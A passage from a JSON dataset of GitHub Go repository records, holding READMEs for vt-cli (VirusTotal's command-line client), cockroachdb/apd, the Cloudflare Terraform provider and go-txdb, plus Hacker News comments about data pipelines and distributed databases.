All rights reserved.\n\n> Copyright 2015 Alan Shreve\n\n> Copyright (c) 2014 Benedikt Lang \n\n> Copyright (c) 2014-2016 Ulrich Kunitz\n\n[go-github]: https://github.com/google/go-github\n[go-update]: https://github.com/inconshreveable/go-update\n[semver]: https://github.com/blang/semver\n[xz]: https://github.com/ulikunitz/xz\n\n\n\n## What is different from [tj/go-update][]?\n\nThis library's goal is the same as tj/go-update, but it's different in following points.\n\ntj/go-update:\n\n- does not support Windows\n- only allows `v` for version prefix\n- does not ignore pre-release\n- has [only a few tests](https://github.com/tj/go-update/blob/master/update_test.go)\n- supports Apex store for putting releases\n\n[tj/go-update]: https://github.com/tj/go-update\n\n\n\n## License\n\nDistributed under the [MIT License](LICENSE)\n\n[GoDoc Badge]: https://godoc.org/github.com/rhysd/go-github-selfupdate/selfupdate?status.svg\n[GoDoc]: https://godoc.org/github.com/rhysd/go-github-selfupdate/selfupdate\n[TravisCI Status]: https://travis-ci.org/rhysd/go-github-selfupdate.svg?branch=master\n[TravisCI]: https://travis-ci.org/rhysd/go-github-selfupdate\n[AppVeyor Status]: https://ci.appveyor.com/api/projects/status/1tpyd9q9tw3ime5u/branch/master?svg=true\n[AppVeyor]: https://ci.appveyor.com/project/rhysd/go-github-selfupdate/branch/master\n[Codecov Status]: https://codecov.io/gh/rhysd/go-github-selfupdate/branch/master/graph/badge.svg\n[Codecov]: https://codecov.io/gh/rhysd/go-github-selfupdate\n[GitHub Enterprise]: https://enterprise.github.com/home\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "VirusTotal/vt-cli", "link": "https://github.com/VirusTotal/vt-cli", "tags": [], "stars": 511, "description": "VirusTotal Command Line Interface", "lang": "Go", "repo_lang": "", "readme": "# VirusTotal CLI\n\nWelcome to the VirusTotal CLI, a tool designed for those who love both VirusTotal and command-line interfaces. With this tool you can do everything you'd normally do using the VirusTotal's web page, including:\n\n* Retrieve information about a [file](doc/vt_file.md), [URL](doc/vt_url.md), [domain name](doc/vt_domain.md), [IP address](doc/vt_ip.md), etc.\n* [Search](doc/vt_search.md) for files and URLs using VirusTotal Intelligence query syntax.\n* [Download files](doc/vt_download.md).\n* [Manage your LiveHunt YARA rules](doc/vt_hunting_ruleset.md).\n* [Launch Retrohunt jobs](doc/vt_retrohunt_start.md) and [get their results](doc/vt_retrohunt_matches.md).\n\nAnd much [more](doc/vt.md)...\n\n## See it in action\n\n[![asciicast](https://asciinema.org/a/179696.png)](https://asciinema.org/a/179696)\n\n## Getting started\n\nAs this tool use the [VirusTotal API](https://developers.virustotal.com/v3.0/reference) under the hood, you will need a VirusTotal API key. By [signing-up](https://www.virustotal.com/#/join-us) with VirusTotal you will receive a free API key, however free API keys have a limited amount of requests per minute, and they don't have access to some premium features like searches and file downloads. If you are interested in using those premium features please [contact us](https://support.virustotal.com/hc/en-us/requests/new).\n\n### Installing the tool\n\nFor installing the tool you can download one the [pre-compiled binaries](https://github.com/VirusTotal/vt-cli/releases) we offer for Windows, Linux and Mac OS X, or alternatively you can compile it yourself from source code. 
To compile the program you'll need Go 1.14.x or higher installed on your system; then type the following commands:\n\n```\n$ git clone https://github.com/VirusTotal/vt-cli\n$ cd vt-cli\n$ make install\n```\n\n### A note on the Windows console\n\nIf you plan to use vt-cli on Windows on a regular basis we highly recommend you avoid the standard Windows console and use [Cygwin](https://www.cygwin.com/) instead. The Windows console is *very* slow when printing large amounts of text (as vt-cli usually does) while Cygwin performs much better. Additionally, you can benefit from Cygwin's support for command auto-completion, a handy feature that the Windows console doesn't offer. In order to take advantage of auto-completion make sure to include the `bash-completion` package while installing Cygwin.\n\n\n### Configuring your API key\n\nOnce you have installed the vt-cli tool you may want to configure it with your API key. This is not strictly necessary, as you can provide your API key every time you invoke the tool by using the `--apikey` option (`-k` in short form), but that's a bit of a hassle if you are going to use the tool frequently (and we bet you will!). To configure your API key just type:\n\n```\n$ vt init\n```\n\nThis command will ask for your API key, and save it to a config file in your home directory (~/.vt.toml). You can also specify your API key using the `VTCLI_APIKEY` environment variable. If you specify your API key in multiple ways, the `--apikey` option will have the highest precedence, followed by the `VTCLI_APIKEY` environment variable; the API key in the configuration file will be used as a last resort.\n\n### Use with a proxy\n\nIf you are behind an HTTP proxy you can tell `vt-cli` the address of your proxy server in multiple ways. One is using the `--proxy` option, as in:\n\n```\n$ vt --proxy http://myproxy.com:1234 \n```\n\nYou can also use the `VTCLI_PROXY` environment variable, or add the following line to the config file:\n\n```\nproxy=\"http://myproxy.com:1234\"\n```\n\n### Setup Bash completion\n\nIf you are going to use this tool frequently you may want to have command auto-completion. It saves both precious time and keystrokes. Notice however that you must configure your API key as described in the previous section *before* following the steps listed below. The API key is necessary for determining the commands that you will have access to.\n\n* Linux:\n ```\n $ vt completion bash > /etc/bash_completion.d/vt\n ```\n\n* Mac OS X:\n ```\n $ brew install bash-completion\n $ vt completion bash > $(brew --prefix)/etc/bash_completion.d/vt\n ```\n Add the following lines to `~/.bash_profile`\n ```\n if [ -f $(brew --prefix)/etc/bash_completion ]; then\n . $(brew --prefix)/etc/bash_completion\n fi\n ```\n\n* Cygwin:\n\n Make sure the `bash-completion` package is installed (Cygwin doesn't install it by default) and type:\n ```\n $ vt completion bash > /usr/share/bash-completion/completions/vt\n ```\n\n:heavy_exclamation_mark: You may need to restart your shell in order for autocompletion to start working.\n\n### Setup ZSH completion\n\nThe output script from `vt completion zsh` needs to be put somewhere under the `$fpath` directory. 
For example, `.oh-my-zsh/completions` directory:\n```shellsession\n$ mkdir /Users/$USERNAME/.oh-my-zsh/completions\n$ vt completion zsh > /Users/$USERNAME/.oh-my-zsh/completions/_vt\n```\n\nRestart the shell.\n\n## Usage examples\n\n* Get information about a file:\n ```\n $ vt file 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85\n ```\n\n* Get a specific analysis report for a file:\n ```\n $ # File analysis IDs can be given as `f--`...\n $ vt analysis f-8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85-1546309359\n $ # ...or as a Base64 encoded string, retrieved from the `vt scan file` command:\n $ vt scan file test.txt\n test.txt MDJiY2FiZmZmZmQxNmZlMGZjMjUwZjA4Y2FkOTVlMGM6MTU0NjQ1NDUyMA==\n $ vt analysis MDJiY2FiZmZmZmQxNmZlMGZjMjUwZjA4Y2FkOTVlMGM6MTU0NjQ1NDUyMA==\n - _id: \"MDJiY2FiZmZmZmQxNmZlMGZjMjUwZjA4Y2FkOTVlMGM6MTU0NjQ1NDUyMA==\"\n _type: \"analysis\"\n date: 1546454520 # 2019-01-02 13:42:00 -0500 EST\n stats:\n failure: 0\n harmless: 0\n malicious: 0\n suspicious: 0\n timeout: 0\n type-unsupported: 0\n undetected: 0\n status: \"queued\"\n ```\n\n* Download files given a list of hashes in a text file, one hash per line:\n ```\n $ cat /path/list_of_hashes.txt | vt download -\n ```\n\n* Get information about a URL:\n ```\n $ vt url http://www.virustotal.com\n ```\n\n* Get the IP address that served a URL:\n ```\n $ vt url last_serving_ip_address http://www.virustotal.com\n ```\n\n* Search for files:\n ```\n $ vt search \"positives:5+ type:pdf\"\n ```\n\n## Getting only what you want\n\nWhen you ask for information about a file, URL, domain, IP address or any other object in VirusTotal, you get a lot of data (by default in YAML format) that is usually more than what you need. You can narrow down the information shown by the vt-cli tool by using the `--include` and `--exclude` command-line options (`-i` and `-x` in short form).\n\nThese options accept patterns that are matched against the fields composing the data, and allow you to include only a subset of them, or exclude any field that is not interesting for you. 
Let's see how it works using the data we have about `http://www.virustotal.com` as an example:\n\n```\n$ vt url http://www.virustotal.com\n- _id: 1db0ad7dbcec0676710ea0eaacd35d5e471d3e11944d53bcbd31f0cbd11bce31\n _type: \"url\"\n first_submission_date: 1275391445 # 2010-06-01 13:24:05 +0200 CEST\n last_analysis_date: 1532442650 # 2018-07-24 16:30:50 +0200 CEST\n last_analysis_results:\n ADMINUSLabs:\n category: \"harmless\"\n engine_name: \"ADMINUSLabs\"\n result: \"clean\"\n AegisLab WebGuard:\n category: \"harmless\"\n engine_name: \"AegisLab WebGuard\"\n result: \"clean\"\n AlienVault:\n category: \"harmless\"\n engine_name: \"AlienVault\"\n result: \"clean\"\n last_http_response_code: 200\n last_http_response_content_length: 7216\n last_http_response_content_sha256: \"7ed66734d9fb8c5a922fffd039c1cd5d85f8c2bb39d14803983528437852ba94\"\n last_http_response_headers:\n age: \"26\"\n cache-control: \"public, max-age=60\"\n content-length: \"7216\"\n content-type: \"text/html\"\n date: \"Tue, 24 Jul 2018 14:30:24 GMT\"\n etag: \"\\\"bGPKJQ\\\"\"\n expires: \"Tue, 24 Jul 2018 14:31:24 GMT\"\n server: \"Google Frontend\"\n x-cloud-trace-context: \"131ac6cb5e2cdb7970d54ee42fd5ce4a\"\n x-frame-options: \"DENY\"\n last_submission_date: 1532442650 # 2018-07-24 16:30:50 +0200 CEST\n private: false\n reputation: 1484\n times_submitted: 213227\n total_votes:\n harmless: 660\n malicious: 197\n```\n\nNotice that the returned data usually follows a hierarchical structure, with some top-level fields that may contain subfields which in turn can contain their own subfields. In the example above `last_http_response_headers` has subfields `age`, `cache-control`, `content-length` and so on, while `total_votes` has `harmless` and `malicious`. For refering to a particular field within the hierarchy we can use a path, similarly to how we identify a file in our computers, but in this case we are going to use a dot character (.) as the separator for path components, instead of the slashes (or backslashes) used by most file systems. The following ones are valid paths for our example structure:\n\n* `last_http_response_headers.age`\n* `total_votes.harmless`\n* `last_analysis_results.ADMINUSLabs.category`\n* `last_analysis_results.ADMINUSLabs.engine_name`\n\nThe filters accepted by both `--include` and `--exclude` are paths in which we can use `*` and `**` as placeholders for one and many path elements respectively. For example `foo.*` matches `foo.bar` but not `foo.bar.baz`, while `foo.**` matches `foo.bar`, `foo.bar.baz` and `foo.bar.baz.qux`. In the other hand, `foo.*.qux` matches `foo.bar.qux` and `foo.baz.qux` but not `foo.bar.baz.qux`, while `foo.**.qux` matches\n`foo.bar.baz.qux` and any other path starting with `foo` and ending with `qux`.\n\nFor cherry-picking only the fields you want, you should use `--include` followed by a path pattern as explained above. You can also include more than one pattern either by using the `--include` argument multiple times, or by using it with a comma-separated list of patterns. 
The following two options are equivalent:\n\n```\n$ vt url http://www.virustotal.com --include=reputation --include=total_votes.*\n$ vt url http://www.virustotal.com --include=reputation,total_votes.*\n```\n\nHere you have different examples with their outputs (assuming that `vt url http://www.virustotal.com` returns the structure shown above):\n\n```\n$ vt url http://www.virustotal.com --include=last_http_response_headers.server\n- last_http_response_headers:\n server: \"Google Frontend\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=last_http_response_headers.*\n- last_http_response_headers:\n age: \"26\"\n cache-control: \"public, max-age=60\"\n content-length: \"7216\"\n content-type: \"text/html\"\n date: \"Tue, 24 Jul 2018 14:30:24 GMT\"\n etag: \"\\\"bGPKJQ\\\"\"\n expires: \"Tue, 24 Jul 2018 14:31:24 GMT\"\n server: \"Google Frontend\"\n x-cloud-trace-context: \"131ac6cb5e2cdb7970d54ee42fd5ce4a\"\n x-frame-options: \"DENY\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=last_analysis_results.**\n- last_analysis_results:\n ADMINUSLabs:\n category: \"harmless\"\n engine_name: \"ADMINUSLabs\"\n result: \"clean\"\n AegisLab WebGuard:\n category: \"harmless\"\n engine_name: \"AegisLab WebGuard\"\n result: \"clean\"\n AlienVault:\n category: \"harmless\"\n engine_name: \"AlienVault\"\n result: \"clean\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=last_analysis_results.*.result\n- last_analysis_results:\n ADMINUSLabs:\n result: \"clean\"\n AegisLab WebGuard:\n result: \"clean\"\n AlienVault:\n result: \"clean\"\n```\n\n```\n$ vt url http://www.virustotal.com --include=**.result\n- last_analysis_results:\n ADMINUSLabs:\n result: \"clean\"\n AegisLab WebGuard:\n result: \"clean\"\n AlienVault:\n result: \"clean\"\n```\n\nAlso notice that `_id` and `_type` are also field names and therefore you can use them in your filters:\n\n```\n$ vt url http://www.virustotal.com --include=_id,_type,**.result\n- _id: \"1db0ad7dbcec0676710ea0eaacd35d5e471d3e11944d53bcbd31f0cbd11bce31\"\n _type: \"file\"\n last_analysis_results:\n ADMINUSLabs:\n result: \"clean\"\n AegisLab WebGuard:\n result: \"clean\"\n AlienVault:\n result: \"clean\"\n```\n\nThe `--exclude` option works similarly to `--include` but instead of including the matching fields in the output, it includes everything except the matching fields. You can use this option when you want to keep most of the fields, but leave out a few of them that are not interesting. If you use `--include` and `--exclude` simultaneously `--include` enters in action first, including only the fields that match the `--include` patterns, while `--exclude` comes in after that, removing any remaining field that matches the `--exclude` patterns.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cockroachdb/apd", "link": "https://github.com/cockroachdb/apd", "tags": [], "stars": 511, "description": "Arbitrary-precision decimals for Go", "lang": "Go", "repo_lang": "", "readme": "# apd\n\napd is an arbitrary-precision decimal package for Go.\n\n`apd` implements much of the decimal specification from the [General Decimal Arithmetic](http://speleotrove.com/decimal/) description. This is the same specification implemented by [python\u2019s decimal module](https://docs.python.org/2/library/decimal.html) and GCC\u2019s decimal extension.\n\n## Features\n\n- **Panic-free operation**. 
The `math/big` types don\u2019t return errors, and instead panic under some conditions that are documented. This requires users to validate the inputs before using them. Meanwhile, we\u2019d like our decimal operations to have more failure modes and more input requirements than the `math/big` types, so using that API would be difficult. `apd` instead returns errors when needed.\n- **Support for standard functions**. `sqrt`, `ln`, `pow`, etc.\n- **Accurate and configurable precision**. Operations will use enough internal precision to produce a correct result at the requested precision. Precision is set by a \"context\" structure that accompanies the function arguments, as discussed in the next section.\n- **Good performance**. Operations will either be fast enough or will produce an error if they will be slow. This prevents edge-case operations from consuming lots of CPU or memory.\n- **Condition flags and traps**. All operations will report whether their result is exact, is rounded, is over- or under-flowed, is [subnormal](https://en.wikipedia.org/wiki/Denormal_number), or is some other condition. `apd` supports traps which will trigger an error on any of these conditions. This makes it possible to guarantee exactness in computations, if needed.\n\n`apd` has three main types.\n\nThe first is [`BigInt`](https://godoc.org/github.com/cockroachdb/apd#BigInt) which is a wrapper around `big.Int` that exposes an identical API while reducing memory allocations. `BigInt` does so by using an inline array to back the `big.Int`'s variable-length value when the integer's absolute value is sufficiently small. `BigInt` also contains fast-paths that allow it to perform basic arithmetic directly on this inline array, only falling back to `big.Int` when the arithmetic gets complex or takes place on large values.\n\nThe second is [`Decimal`](https://godoc.org/github.com/cockroachdb/apd#Decimal) which holds the values of decimals. It is simple and uses a `BigInt` with an exponent to describe values. Most operations on `Decimal`s can\u2019t produce errors as they work directly on the underlying `big.Int`. Notably, however, there are no arithmetic operations on `Decimal`s.\n\nThe third main type is [`Context`](https://godoc.org/github.com/cockroachdb/apd#Context), which is where all arithmetic operations are defined. A `Context` describes the precision, range, and some other restrictions during operations. These operations can all produce failures, and so return errors.\n\n`Context` operations, in addition to errors, return a [`Condition`](https://godoc.org/github.com/cockroachdb/apd#Condition), which is a bitfield of flags that occurred during an operation. These include overflow, underflow, inexact, rounded, and others. The `Traps` field of a `Context` can be set which will produce an error if the corresponding flag occurs. An example of this is given below.\n\nSee the [examples](https://godoc.org/github.com/cockroachdb/apd#pkg-examples) for some operations that were previously difficult to perform in Go.\n\n## Documentation\nhttps://pkg.go.dev/github.com/cockroachdb/apd/v3?tab=doc\n", "readme_type": "markdown", "hn_comments": "Nice work! We're really proud of how the warehouse sync feature we built at Customer.io turned out. We had to do it all from scratch though!Good luck with the next steps for Pipebird.I should mention that we're happy to do a white-gloved deployment for anyone that wants to test out what this would look like in their product - feel free to email hello@pipebird.comLooks useful! 
Do you have a way to validate that the data was copied correctly and entirely? If not, you might want to consider integrating data-diff for that - https://github.com/datafold/data-diffHey all, one of the co-founders of Pipebird here - I'll be around to answer any questions you might have. Would love to hear your feedback!besides creating more value for our b2b customer, can this help our own company in anyway.Hey folksThe product looks great. I had faced such situations in past with different tools.You should make the PM and Dev community aware of this tool to get better leads and usecases.Wish you best for the future.Hey team, Charles here, co-founder of prequel.co (YC W21). We also help companies share data with their customers.As someone who's been playing in the data sharing space, it's really exciting to see it get more attention!All the best to y'all!Hey, interesting work.\nI wonder how do you compare pipebird with data tools like Airbyte?This is dope! Hope to see more companies (including ours!) integrate more data pipelines!Global Tables let database clients in any region read strongly consistent data with region-local latencies. They\u2019re an important piece of the multi-region puzzle \u2014 providing latency characteristics that are well suited for read-mostly, non-localized data.It's an exciting time for cloud-native databases. I'm especially curious how various emulation layer approaches will shake out, for example, between CRDB and Neon which do pgsql wire protocol emulation vs block device emulation, respectively.Is something similar possible using Postgres / Citus?E.g. If I have a multi-tenant architecture but want a global table for say a postgres full-text-search index of content from the distributed tenants, what would the recommend route be?Global tables seem like a great feature. I'd gladly sacrifice write speed for it.I recently tried CockroachDB's serverless offering and I was very satisfied with it. It has a generous free tier, easy-to-understand pricing, and a query analyzer that helps me estimate how much a query would cost. It is still in beta but already feels extremely polished.The only complaint so far is that there are very few supported regions. (Oregon, N. Virginia, Frankfurt, Ireland, Singapore, Mumbai for AWS, and S\u00e3o Paulo, California, South Carolina, Iowa, St. Ghislain, Jurong West for GCP, as of now.) Even the list of supported regions could not be found online, only to be found after signing up. Was it intentional to drop the information from the documentation? Not that this is a huge problem, considering I'm still on the free plan, but I wonder if they're planning to add more regions in the near future.The calculation method and the overall page design is very similar to ClickHouse benchmarks:https://clickhouse.com/benchmark/dbms/\nhttps://presentations.clickhouse.com/original_website/benchm... 
(2013)The table and diagram layout, the checkboxes and controls, the \"geometric mean of ratios\", etc.But it does not have proper attribution and it looks unfair.\nYou can reference directly to me (Alexey Milovidov) if needed.You are missing something.You list several completely different types of databases and then mention you are looking for a \"general purpose database\".This tells me you do not understand the problem you are trying to solve, therefore do not know how to define the requirements nor features you require to solve it.It also tells me you do not understand the difference between different types of databases, nor the niche they fill, let alone why their HA functions very differently.I'm not sure if Percona's HA solutions are any better than what MariaDB offers, but it's not in your list, so maybe worth mentioning.https://www.percona.com/services/support/high-availabilityhttps://www.percona.com/blog/2021/04/14/percona-distribution...The community is still slowly recovering from the collapse of the company but RethinkDB is worth considering in your analysis.> What do I mean by Fake Open Source? A project that has a large percentage of its contributors beholden to a single organization/entity to me is not really open source in spirit.Then you should use a different term - something like \"community project\". The single organization projects are still open source, both technically and in spirit.> I'm looking for a project where I can feel confident my contributions won't effectively end up behind some proprietary license down the line if/when the VC backed organization that primarily sponsors development decides it needs to protect itself from AWS.If you're talking about ElasticSearch, I'll point out that Amazon forked it and OpenSearch is not behind a proprietary license, so all contributions made to ElasticSearch continue to be available as open source, with improvements being made.One thing which Percona has which MySQL and MariaDB does not is mature operators with HA support, which if you're using Kubernetes make High Availability much easierhttps://www.percona.com/software/percona-kubernetes-operator...Disclosure: I'm CEO at PerconaI have deployed and run Cassandra myself, basically as you describe.The first 'dev' Cassandra install was three nodes. I downloaded the .tar.gz, installed it, started each process in turn on each node with the required configuration.That was 2012 and there is a chance that cluster is still running. It was low-volume in terms of data. TTL configured so it would never run out of disk. Never had any issues in particular. I used it for ~5 years before concluding work with that client.The problem in that case was Cassandra proliferated in that small company, they didn't build any particular expertise beyond me, and in the end I was being pulled into discussions from different teams, different products, split across about 13 clusters. Wasn't much fun - but that wasn't the DB's fault.I'm not sure if you're just picky or discerning but it seems you can find a reason to exclude anything if all you do is look for reasons to exclude.Why not just use SQLite with streaming replication? It should fit your bill.Databases rarely have what you would define as real open source with real contributors because the nature of a database means you need one owner and that owner has to be picky and exclude things. 
Allowing the wrong commit into MariaDB could introduce regressions that no one even could imagine because the complexity of things.Even when a database starts out the way you describe with good intentions in order for it to become a widely adopted product it has to be pulled in under a single umbrella to direct it and build it toward its vision. This puts it firmly in your fake open source camp.PostgresSQL - Not sure which HA solution you had experience with:\nhttps://patroni.readthedocs.io/en/latest isn't too bad.\nold adage comes to mind. Fast/Cheap/Good - pick 2\nHA design are not all created equal. rubber stamp something HA often give false sense of security. HA to me is explicitly defined risk(down time) tolerance.\nFor each of 9 it get more complex and cost goes up. Most commercial DB with HA are opinionated which is often the opposite ethos of open sourceI'd say Oracle has been a better steward of MySQL than Sun was back when Sun was a separate company.Yep, your assessment seems broadly accurate to me. I was going to suggest Cassandra until I saw it in the list. I'm {interested in/optimistic about} FoundationDB too, although haven't had a chance to use it in practice yet.Out of curiosity: what would your preferred choice(s) be to fit these requirements using existing proprietary products?What do you want specifically in a DB? Consistency? Sql or nosql? HA or sharded? homogeneous nodes?Jbtw, the risk of nodes dying is quite exaggerated. DO/Vultr/Linode all provide 99.99% up timeIt's not clear to me why you need a distributed database in the first place. If it's just for general purpose small scale projects, does it really matter if your database is down once a year?I run a couple of Postgres databases on cheap linux VMs, for various projects, and they have been running smoothly for years. The only problem I had was two times when the disk was full. If I had multiple nodes they would all have been full...Github has been down more often than my Postgres databases.HA adds so much complexity and tradeoffs that I would really think hard about wether it's worth it for your use case.The reason: ha for databases is hard.However galera cluster and/or percona xtradb cluster work remarkably well, considering they\u2019re open source.> YugabyteDB: Fake Open Source. Special shout out here for not even linking to instructions for how to build the database in the readme.All the features are open source. Here is how to build from source https://docs.yugabyte.com/latest/contribute/core-database/bu....> What do I mean by Fake Open Source? A project that has a large percentage of its contributors beholden to a single organization/entity to me is not really open source in spirit.Well, somebody gotta start the project, no? Feel free to contribute though. Since it reuses PostgreSQL, it directly inherits the \"postgresql community commits\". The same with being a fork of Apache Kudu fork.> If there's an \"Enterprise\" product and the organization calls the source code for the main project the \"Community Edition\" or something like it, it's not Real Open Source.The \"Enterprise\" edition is \"just\" some scripts that make deployment & monitoring easier (and includes 24/7 developer support). All c++ features are open source.And it's still young. 
You can't compare against PostgreSQL that has 20+ years of being available.Manticore Search is not in the list:* 100% open source (GPLv2)* Easy replication: - node 1: CREATE CLUSTER c; ALTER CLUSTER c ADD tbl; \n\n - node 2: JOIN CLUSTER c AT 'host:port'\n\n* Easy HA: CREATE TABLE dist TYPE='distributed' agent='...' agent='...'* Real alternative to Elasticsearch in terms of built-in full-text search capabilities, but easier to use.* Works fine with small and large data volumes:\n - with in-memory storage for smaller data\n - with columnar storage (separate library, Apache2 license) for big data that doesn't fit into RAM* Does analytical queries well* Not fully ACID-compliant (as well as Elasticsearch, Clickhouse others)rqlite https://github.com/rqlite/rqliteI'm the creator of this project. While it's not going to work super well at very large datasets, it's explicitly designed to be trivial to deploy, and very easy to operate. You can get it up and running in seconds, and clustering seconds later. My practical experience with databases told me that operating the database is at least as important as performing queries with it. So I put a lot of work into easy clustering, clear diagnostics, and solid code.I\u2019m not understanding why it matters if it\u2019s fake open source or not. Even with \u201creal open source\u201d there\u2019s no guarantee your contributions will be included. Or that the license won\u2019t change in the future.Didn't make it to prod.I tried migrating to YB at one point. I had issues migrating the indices (got lots of timeout issues). Once I got past that, I found out that a particular query I needed to do didn't have predicate pushdowns implemented and so always resulted in a full table scan. Ended up giving up.Cockroach (at the time at least, ~1.25 years ago) didn't have support for some JSONB things that I needed.We used CRDB 2.1.4 and then on the YYYY versions when they changed to a date based version scheme in production at a fintech. This must have been a year or so ago. I've since left. I think they might still be using it. Back then it had issues with SQLAlchemy and we had to do much in teh way of changing our application to be more cloudy in the sense of being able to retry transactions and such.I don't think we trialed YugaByte at the time because an ORM story was a dealbreaker and CRDB at least advertised support.We used CRDB (and still do) in production and a scale (billions of records+) and have found it to be very good. While it does not have every advanced feature of PostgreSQL, you get very easy clustering and operational simplicity which drive reliability. The command like tools that come with it are also fantastic. Impressive database that\u2019s been a joy to work with. Sorry, no direct experience with YB.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/terraform-provider-cloudflare", "link": "https://github.com/cloudflare/terraform-provider-cloudflare", "tags": ["terraform", "terraform-provider", "cloudflare"], "stars": 511, "description": "Cloudflare Terraform Provider", "lang": "Go", "repo_lang": "", "readme": "# Cloudflare Terraform Provider\n\n## Quickstarts\n\n- [Getting started with Cloudflare and Terraform](https://developers.cloudflare.com/terraform/installing)\n- [Developing the provider](contributing/development.md)\n\n## Documentation\n\nFull, comprehensive documentation is available on the [Terraform Registry](https://registry.terraform.io/providers/cloudflare/cloudflare/latest/docs). 
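As a quick orientation (a sketch only; the Registry documentation is authoritative, and the `cloudflare_api_token` variable name is illustrative), a typical configuration selects a provider version and supplies an API token:\n\n```hcl\nterraform {\n required_providers {\n cloudflare = {\n source = \"cloudflare/cloudflare\"\n version = \"~> 3\"\n }\n }\n}\n\nprovider \"cloudflare\" {\n # illustrative variable name; supply your own token variable\n api_token = var.cloudflare_api_token\n}\n```\n\n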
[API documentation](https://api.cloudflare.com) and [Developer documentation](https://developers.cloudflare.com) are also available\nfor non-Terraform or service-specific information.\n\n## Migrating to Terraform from using the Dashboard\n\nDo you have an existing Cloudflare account (or many!) that you'd like to transition\nto be managed via Terraform? Check out [cf-terraforming](https://github.com/cloudflare/cf-terraforming),\nwhich is a tool Cloudflare has built to help dump the existing resources and\nimport them into Terraform.\n\n## Version 4.x early release candidates\n\n> **Warning** Release candidates may contain bugs and backwards incompatible state modifications. **You should not use them in production unless you are clear on the ramifications and have a clear backup plan in the event of breakages.**

For production usage, the 3.x release is recommended, using the `~> 3` provider version selector.\n\nWe are working on releasing the next major version of the Cloudflare Terraform Provider and want your help! \n\nIf you have suitable workloads and would like to test out the next release before everyone else, you can opt in by updating your provider `version` to explicitly match one of the release candidate versions ([`~>`, `>` or `>=` will not work](https://developer.hashicorp.com/terraform/language/expressions/version-constraints#version-constraint-behavior)). See the [releases](https://github.com/cloudflare/terraform-provider-cloudflare/releases) page for available versions.\n\n```hcl\nterraform {\n required_providers {\n cloudflare = {\n source = \"cloudflare/cloudflare\"\n version = \"4.0.0-rc1\"\n }\n }\n}\n```\n\nBe sure to check out the [version 4 upgrade guide](https://registry.terraform.io/providers/cloudflare/cloudflare/latest/docs/guides/version-4-upgrade) and make any necessary modifications. If you hit bugs, please [open a new issue](https://github.com/cloudflare/terraform-provider-cloudflare/issues/new/choose).\n\n## Contributing\n\nTo contribute, please read the [contribution guidelines](contributing/README.md).\n\n## Feedback\n\nIf you would like to provide feedback (not a bug or feature request) on the Cloudflare Terraform provider, you're welcome to do so via [this form](https://forms.gle/6ofUoRY2QmPMSqoR6).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "DATA-DOG/go-txdb", "link": "https://github.com/DATA-DOG/go-txdb", "tags": ["sql-driver", "integration-testing", "go", "golang", "tdd", "sql", "testing"], "stars": 511, "description": "Immutable transaction isolated sql driver for golang", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/DATA-DOG/go-txdb.svg?branch=master)](https://travis-ci.org/DATA-DOG/go-txdb)\n[![GoDoc](https://godoc.org/github.com/DATA-DOG/go-txdb?status.svg)](https://godoc.org/github.com/DATA-DOG/go-txdb)\n\n# Single transaction based sql.Driver for GO\n\nPackage **txdb** is a single transaction based database sql driver. When the connection\nis opened, it starts a transaction and all operations performed on this **sql.DB**\nwill be within that transaction. If concurrent actions are performed, a lock is\nacquired and the connection is always released; statements and rows do not hold the\nconnection.\n\nWhy is it useful? A very basic use case: if you want to write functional tests,\nyou can prepare a test database once and do not have to reload it within each test.\nAll tests are isolated within a transaction and therefore run fast. And you do not have\nto put an interface around your **sql.DB** reference in your code, because **txdb** behaves like a standard **sql.Driver**.\n\nThis driver supports opening any **sql.Driver** connection. You can register txdb\nfor different sql drivers and have it under different driver names. Under the hood,\nwhenever a txdb driver is opened, it attempts to open a real connection and starts a\ntransaction.
When close is called, it rollbacks transaction leaving your prepared\ntest database in the same state as before.\n\nGiven, you have a mysql database called **txdb_test** and a table **users** with a **username**\ncolumn.\n\n``` go\n package main\n\n import (\n \"database/sql\"\n \"log\"\n\n \"github.com/DATA-DOG/go-txdb\"\n _ \"github.com/go-sql-driver/mysql\"\n )\n\n func init() {\n // we register an sql driver named \"txdb\"\n txdb.Register(\"txdb\", \"mysql\", \"root@/txdb_test\")\n }\n\n func main() {\n // dsn serves as an unique identifier for connection pool\n db, err := sql.Open(\"txdb\", \"identifier\")\n if err != nil {\n log.Fatal(err)\n }\n defer db.Close()\n\n if _, err := db.Exec(`INSERT INTO users(username) VALUES(\"gopher\")`); err != nil {\n log.Fatal(err)\n }\n }\n```\n\nEvery time you will run this application, it will remain in the same state as before.\n\n### Testing\n\nUsage is mainly intended for testing purposes. See the **db_test.go** as\nan example. In order to run tests, you will need docker and\ndocker-compose:\n\n docker-compose up\n make test\n\nThe tests are currently using `postgres` and `mysql` databases\n\n### Documentation\n\nSee [godoc][godoc] for general API details.\nSee **.travis.yml** for supported **go** versions.\n\n### Contributions\n\nFeel free to open a pull request. Note, if you wish to contribute an extension to public (exported methods or types) -\nplease open an issue before to discuss whether these changes can be accepted. All backward incompatible changes are\nand will be treated cautiously.\n\nThe public API is locked since it is an **sql.Driver** and will not change.\n\n### License\n\n**txdb** is licensed under the [three clause BSD license][license]\n\n[godoc]: http://godoc.org/github.com/DATA-DOG/go-txdb \"Documentation on\ngodoc\"\n\n[golang]: https://golang.org/ \"GO programming language\"\n\n[license]:http://en.wikipedia.org/wiki/BSD_licenses \"The three clause BSD license\"\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mozilla/tls-observatory", "link": "https://github.com/mozilla/tls-observatory", "tags": [], "stars": 511, "description": "An observatory for TLS configurations, X509 certificates, and more.", "lang": "Go", "repo_lang": "", "readme": "# Mozilla TLS Observatory\n\n[![What's 